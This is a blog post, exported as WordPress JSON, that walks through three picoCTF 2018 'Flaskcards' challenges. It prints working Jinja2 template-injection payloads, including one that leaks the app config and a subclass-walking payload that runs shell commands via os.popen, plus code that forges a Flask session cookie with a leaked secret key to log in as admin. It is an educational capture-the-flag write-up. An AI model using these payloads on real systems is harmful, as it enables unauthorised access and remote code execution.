{"id":281,"date":"2018-10-09T12:41:17","date_gmt":"2018-10-09T16:41:17","guid":{"rendered":"http:\/\/www.wispwisp.com\/?p=281"},"modified":"2020-11-09T23:43:46","modified_gmt":"2020-11-09T23:43:46","slug":"picoctf-ctf-flaskcards-serial","status":"publish","type":"post","link":"https:\/\/www.wispwisp.com\/index.php\/2018\/10\/09\/picoctf-ctf-flaskcards-serial\/","title":{"rendered":"picoctf CTF 2018 Flaskcards serial"},"content":{"rendered":"

picoCTF is a CTF hosted by CMU targeted at high school students, which is a great opportunity for beginner to improve their skill. I enjoy this CTF a lot.<\/span>
Not really a Team, just me.<\/span>
\"\"<\/span> <\/p>\n

\n

This is the Writeup for Flaskcards serial: “Flaskcards”, “Flaskcards Skeleton Key” and “Flaskcards and Freedom”.<\/span><\/p>\n

All three problems have the same interface: first you create an account, login in with the account you created, exploit different vulnerabilities to get the Flag.<\/span><\/p>\n

This is the register page:<\/span>
\"\"<\/span>
After the user login to the account, the user can create a Flashcard by entering the question and answer:<\/span>
\"\"<\/span>
Click “List Cards” on the top to show the Flashcard:<\/span>
\"\"<\/span>
There is an Admin Page on the website, which looks interesting:<\/span>
\"\"<\/span><\/p>\n

Problem 1, Flaskcards:<\/strong><\/span>
We found this fishy website<\/a> for flashcards that we think may be sending secrets. Could you take a look?<\/span><\/p>\n

For this problem, I try base64decode the Cookie, but the output is not plain text.<\/span>
 \"\"<\/span>
\"\"<\/span>
I noticed the name of the problem is strange, it should spell as “Flashcard”, but why the name is “Flaskcard”? <\/span>Then I realize this can be a Flask application, which might be vulnerable to template injection attack: https:\/\/portswigger.net\/blog\/server-side-template-injection<\/a><\/span><\/p>\n

I test the input {{2*2}}<\/code>, if the application is vulnerable to template injection, it should return “4”.<\/span>
\"\"<\/span>
And it did return “4”, which prove the application is vulnerable to a template injection attack.<\/span>
\"\"<\/span>
{{config}}<\/code> can show the configuration of the application, I create a card with Question {{config}}<\/code>.<\/span><\/p>\n

The server returns the application configuration and the Flag:<\/span>
\"\"<\/span><\/p>\n

Problem 2: Flaskcards Skeleton Key<\/strong><\/span>
Nice! You found out they were sending the Secret_key: 385c16dd09098b011d0086f9e218a0a2. Now, can you find a way to log in as admin? http:\/\/2018shell3.picoctf.com:48263 (link).<\/span><\/p>\n

It seems the problem want me to login as Admin. I Google how cookie work in Flask application:<\/span>
Found this: http:\/\/flask.pocoo.org\/docs\/1.0\/quickstart\/<\/a><\/span><\/p>\n

And this write-up form 2017 ASIS CTF that is also related to Flask Cookie and template injection. I use the Code from this article to encode and decode the Flask Cookie<\/span>: https:\/\/teamrocketist.github.io\/2017\/09\/11\/Web-ASIS-Golem-is-stupid<\/a><\/span><\/p>\n

My original cookie value: .eJwtjzluwzAQAP_C2sWS1B70Z4Q9EcNAAkh2FeTvVpF-Bpj5bXsdeX61--t4563tj2j3toVLLEIgRYwuMHTSDB6zvGIaOiLpFgJuY1oaLdhURXQiMPuojQZNBevSid2kz3SPYcVLFwsEGoIAVYHPSs6QEL7YciNot-bnUfvr55nfV8_FC9YombnRsloLGVndK6tTUC7OYayX9z7z-J9ofx-whT-m.Dp7TIg.XWUpmVkxoQAUPFWekpTEPe2UA2U<\/code><\/span><\/span>
The cookie value after decoding:<\/span><\/p>\n

\n

{u'csrf_token': u'80d85f2f83e469bf995757accfef16d6e97e2b7a', u'_fresh': True, u'user_id': u'4', u'_id': u'4dc8d96506a55d1802a363d723fcfd3b5c556a4d80cb23beb6904aa88a35077c2f46263a0b18167cb813eccd2bf79a9780d5b50806ff0c3fe7ed8d87167fcb60'}<\/span><\/code><\/span><\/p>\n<\/blockquote>\n

I change the \"user_id\"<\/code> value to 1<\/code> and encode the Cookie again:<\/span><\/p>\n

\n

sk = '385c16dd09098b011d0086f9e218a0a2'
\ndecodedDict = decodeFlaskCookie(sk, '.eJwtjzluwzAQAP_C2sWS1B70Z4Q9........original Cookie value....UA2U')
\nprint decodedDict
\ndecodedDict['user_id'] = '1'
\ncookie = encodeFlaskCookie(sk, decodedDict)cookie = encodeFlaskCookie(sk, decodedDict)<\/code><\/span><\/p>\n<\/blockquote>\n

Insert the new Cookie in Chrome:<\/span>
\"\"<\/span><\/p>\n

Get the Flag from the Admin page:<\/span>
\"\"<\/span><\/p>\n

Problem 3: Flaskcards and Freedom<\/span><\/strong>
There seem to be a few more files stored on the flashcard server but we can’t log in. Can you? http:\/\/2018shell3.picoctf.com:46628 (link)<\/span><\/p>\n

From the hint I know I need to achieve remote code execution to get the Flag:<\/span>
\"\"<\/span>
After Googling and Baiduing “Flask template injection”, the first step is to dump all available class with command:<\/span>
{{[].__class__.__base__.__subclasses__()}}<\/code><\/span>
\"\"<\/span>
The server returns all available class:<\/span>
\"\"<\/span><\/p>\n

The second step is to find certain Classes that have the ability to do “eval” or “exec”, in this case, I use \"warings.catch_warnings\"<\/code><\/span>
Copy and Paste all the classes in Sublime Text and format them nicely so we can find out where is the \"warings.catch_warnings\"<\/code> Class. The number is 243, so to call the Class, the command should be:<\/span>
{{[].__class__.__base__.__subclasses__()[243]}}<\/code><\/span>
\"\"<\/span><\/p>\n

From this post: https:\/\/blog.csdn.net\/qq_27446553\/article\/details\/79379136<\/a>. I learn that the command to execute code will be:<\/span>
{{[].__class__.__base__.__subclasses__()[243].__init__.__globals__['__builtins__'].eval('__import__(\"os\").popen(\"ls\").read()')}}<\/code><\/span>
Create a card with the command above, the server will return:<\/span>
\"\"<\/span>
Found a file called “Flag”, use “cat flag” to read the Flag:<\/span>
{{[].__class__.__base__.__subclasses__()[243].__init__.__globals__['__builtins__'].eval('__import__(\"os\").popen(\"cat flag\").read()')}}<\/code><\/span>
\"\"<\/span><\/p>\n

Reference:<\/span>
https:\/\/blog.csdn.net\/qq_27446553\/article\/details\/79379136<\/a><\/span>
http:\/\/shaobaobaoer.cn\/archives\/660\/python-flask-jinja-ssti<\/a><\/span>
https:\/\/teamrocketist.github.io\/2017\/09\/11\/Web-ASIS-Golem-is-stupid<\/a><\/span><\/p>\n\n\n

<\/p>\n","protected":false},"excerpt":{"rendered":"

picoCTF is a CTF hosted by CMU targeted at high school students, which is a great opportunity for beginner to improve their skill. I enjoy this CTF a lot.Not really a Team, just me.  This is the Writeup for Flaskcards serial: “Flaskcards”, “Flaskcards Skeleton Key” and “Flaskcards and Freedom”. All three problems have the same interface: first […]<\/p>\n","protected":false},"author":1,"featured_media":694,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[],"_links":{"self":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts\/281"}],"collection":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/comments?post=281"}],"version-history":[{"count":4,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts\/281\/revisions"}],"predecessor-version":[{"id":749,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/posts\/281\/revisions\/749"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/media\/694"}],"wp:attachment":[{"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/media?parent=281"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/categories?post=281"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wispwisp.com\/index.php\/wp-json\/wp\/v2\/tags?post=281"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}